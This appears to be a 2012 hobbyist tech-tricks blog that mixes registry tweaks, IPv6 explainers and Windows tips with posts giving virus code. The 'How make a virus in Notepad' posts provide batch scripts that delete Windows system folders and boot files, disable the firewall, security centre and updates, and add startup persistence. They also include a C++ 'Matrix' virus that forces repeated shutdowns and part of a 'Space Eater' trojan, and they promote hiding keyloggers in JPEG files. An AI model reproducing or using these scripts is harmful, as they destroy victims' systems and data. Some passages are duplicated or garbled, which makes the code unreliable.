Saturday, 1 September 2012
Enable/Disable Local Group Policy Objects
In a non-networked environment (or in a networked environment that does not have a domain controller), the local Group Policy object's settings are more important, because they are not overwritten by other
Group Policy objects. You can open the Group Policy snap-in to edit the local Group Policy object that is stored on your local computer.
Click Group Policy to open the local Group Policy object. This tweak allows
you to disable Local Group Policy Objects.
[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following key.
Registry Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Wind
ows\System
[ In most cases, this registry key is not present and will
need to be created ]
Saturday, 11 August 2012
Space Eater(VIRUS) code
This is an virus source code. only for educational purpose DO NOT SPREAD IT.. It is harmful program.
BEWARE:-Do not compile it in your own pcs. do not recognize by any of the antivirus...
/* SPACE EATER TROJAN . USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/
#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
void eatspace(void);
void findroot(void);
BEWARE:-Do not compile it in your own pcs. do not recognize by any of the antivirus...
/* SPACE EATER TROJAN . USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/
#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
void eatspace(void);
void findroot(void);
10 Interesting facts about Microsoft
Almost every one Knows Microsoft and its operating System Windows. But you will probably not know the following 10 interesting facts!1. No one knows the reason, but it is impossible to create a folder named "con" or "Con". It is just not possible. And if you try to fool Windows by naming the folder "c-o-n", you will get an error message.
2. When you enter "=rand (200,99)" without the quotations into Microsoft Word, something very weird happens. After pressing "enter", the document is filled with more than 400,000 words.
Tuesday, 7 August 2012
How make a virus in Notepad-2
SHUT UR INTERNET PERMANENTLY:::
This is a slightly more advanced one. It shuts down your internet permanately. I tried it on
myself accidently, i knew what it did, and it still took me a couple of days to get my internet
back. works best on XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll site or something. BTW, that 3rd line, isnt what disables the
internet permanately. It is somethinge else, that just provides a fast response to shut down
any connections.
<code>@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d
%systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /releasedel "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO
[HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t
reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t
reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a
MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::
Warning - Do not run it on your computerI'm gonna teach you how to make a virus named Matrix...
1-Open notepad
2-Put in this code
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat",
ios::app);
fp << "@ECHO OFF n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF n";
fp << "COPY matrix.exe C:\rawr.exe n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
system("START CLICK.bat");
main()
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN |
FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " ";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
3-save it as matrix.bat
4-finish
then compile it using diz..
http://rapidshare.com/files/172088914/QuickBFC.exe
and finally it should be matrix.exe
AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE
NOT GIVEN
AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS
STDIN,STDLIB,CONIO , AND STUFF LIKE THAT
How make a virus in Notepad-1
How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed
to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**
QoS Bandwidth Reserve Setting - Faster Internet Connection
Beware Editing in the registry files can slow down your computer
By default, Windows XP reserves 20% of the connection bandwidth for QoS traffic। This tweak allows the setting to be altered to a different percentage of connection bandwidth। If the system uses more than a single adapter for network connections, each adapter may be set
individually by navigating to:
Registry Tricks for Windows - Clear Pagefile on Shutdown
Beware Editing in the registry files can slow down your computer
As an added security precaution it is possible to clear all data that has been written to the
page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase shutdown time depending on the amount of data in the page file.
[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following key
As an added security precaution it is possible to clear all data that has been written to the
page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase shutdown time depending on the amount of data in the page file.
[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following key
Tuesday, 31 July 2012
Hide Keyloggers into a JPEG file
Through this trick you can easily hidekeyloggers.
First download any key logger from
google i think Ardamax is best.
After installing just follow these easy steps=>
1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension of all your files on your pc.
Sunday, 22 July 2012
Introduction To WebGoat A revolutionary Web Attack Tool
WebGoat is aJ2EE web application, created by the OWASP community to provide a teaching environment for web application security. It is a deliberately insecure program,where you must go through a number of lessons . In each lessons, you learn about a new sort of vulnerability, and in the same moment get a hands on try at exploiting that vulnerability.
Thursday, 12 July 2012
A new cross platform Trojan downloader has been discovered.
By Animesh Kantfact, Tweeks, Virus
A new Trojan downloader has been discovered which detects
your platform i.e. your operating system which you have and downloads the
corresponding malware for your platform.
Remember the cross-platform malware that exploited Java to
attack both PCs and Macs?
Here’s better one for you : A Trojan downloader that check
your operating system and then pick up the malware which is suitable for your
PCs/Macs.
The new Web-Based Social Engineering attacks, first detected
on the Columbia websites, relies on a malicious Java applet to install
backdoors on windows, Macs and Linux. When you first visit such a compromised
site, then that applet program checks which operating system you have (Windows,
Mac OS X, Linux) and then drops a corresponding Trojan for your platform.
Sunday, 24 June 2012
GOOGLE DRIVE- NEW APPS FOR YOU

Recently, google launched its dropbox competitor, offering up to 5Gb of free storage space, not to mention the ability to download files and sync folders on multiple computers. here are a few tips to have make effective use of GOOGLE DRIVE.
PREVENT FILES FROM DOWNLOADING
We all know sharing is a great collaboration feature on google drive (right from its google docs days), but how do you prevent someone form downloading the file onto there pcs? It's simple.
Sunday, 17 June 2012
SOMETHING MORE ABOUT THE IPv6
Enabling IPv6


In this post I am going to discuss something more about the IPv6 networks.
The switch’s implementation of IPv6 is disabled by default. To enable IPv6, use
the command:
ENABLE IPV6
To disable IPv6, use the command:
DISABLE IPV6
Any IPv6 configuration which the switch has performed dynamically will be
preserved between disabling and re-enabling IPv6. For example, any addresses
which have been configured will still be present.
Sunday, 10 June 2012
FEATURE OF THE IPv6
In my previous post I am just introduced the IPv6, its Feature and the challenges to Internet . Now in this post I am going to explain the feature of the IPv6. It has too many exciting features. Like:-
•Addressing
•Header
•Security
•Privacy
•Autoconfiguration
•Routing
•Quality of Service
Friday, 8 June 2012
Introduction to IPv6 (Internet Protocol Version 6)
What is IPv6?
Internet Protocol Version 6 (IPv6) is a network layer protocol that enables data communications over a packet switched network. Packet switching involves the sending and receiving of data in packets between two nodes in a network.
It has primarily been developed to solve the problem of the eventual exhaustion of the IPv4 address
space, but also offers other enhancements. IPv6 addresses are 16 bytes long, in contrast to IPv4’s 4 byte addresses.
The working standard for the IPv6 protocol was published by the Internet Engineering Task Force (IETF) in 1998.
Tuesday, 5 June 2012
Monday, 4 June 2012
How to trace E-mail sending Location
To track an email and its senders location details, you must know its internet IP address from which he sends the e-mail to you.
Here is the procedure on how you can track the email and its sender's locations by finding there Ips. Once we get the IP Address of the sender, it is very easy to track the sender location.
Finding the location is very useful in verifying the mails and the place they are sent. Since we receive the mails every day some of them may be verified for safety if they are regarding some offers or prizes.
Basically there are two basic steps involved in this, one is finding the IP of the e-mail sender in the header section and then checking the location of that ip.
To find the IP address of an e-mail in the world's most popular Gmail:-
Here is the procedure on how you can track the email and its sender's locations by finding there Ips. Once we get the IP Address of the sender, it is very easy to track the sender location.
Finding the location is very useful in verifying the mails and the place they are sent. Since we receive the mails every day some of them may be verified for safety if they are regarding some offers or prizes.
Basically there are two basic steps involved in this, one is finding the IP of the e-mail sender in the header section and then checking the location of that ip.
To find the IP address of an e-mail in the world's most popular Gmail:-
Tuesday, 29 May 2012
How To Make Your Own Key Logger In Visual C++
Today I am going to teach "How
To Make Your Own Key Logger ". If you know the C++ then you can easily understand the program.
Now a days key loggers are common to all the advance users it is a basic software but very useful software . But many people don't know that what is key logger.
Now a days key loggers are common to all the advance users it is a basic software but very useful software . But many people don't know that what is key logger.
Key Loggers are often
called Keystroke logging is
the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person
using the keyboard is unaware that their actions are being monitored.
Here is the example of some of the key loggers:
1>refog
2>beyond
3>elite etc.
but I prefer the ardamax keylogger.
but I prefer the ardamax keylogger.
Friday, 25 May 2012
Make Your Computer Speak When you Log On
It’s a simple trick to amaze your friends.When you Log On infront of them.
Yeah a trick to make your Computer Welcome you on Start Up.
Lets Do It:
Open Notepad
Paste the bellow code in Np
Dim speaks, speech
speaks="Welcome Back, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
Friday, 11 May 2012
Create new instance of an Application in Windows 7 Super Taskbar
In windows 7 Taskbar instance of an application can easily be created by using Win + Number Key. Here number key signifies the position of the Application in the Taskbar
If you press Windows + 1, it will create a new instance of the first icon in the task bar. In the taskbar Shown here it will open an instance of Internet Explorer while Win+5 open Windows media Player, Win+7 to Windows Live writer and so on.
Now that‟s when i wish there must be Double digit Keys as well in Keyboard.
If you press Windows + 1, it will create a new instance of the first icon in the task bar. In the taskbar Shown here it will open an instance of Internet Explorer while Win+5 open Windows media Player, Win+7 to Windows Live writer and so on.
Now that‟s when i wish there must be Double digit Keys as well in Keyboard.












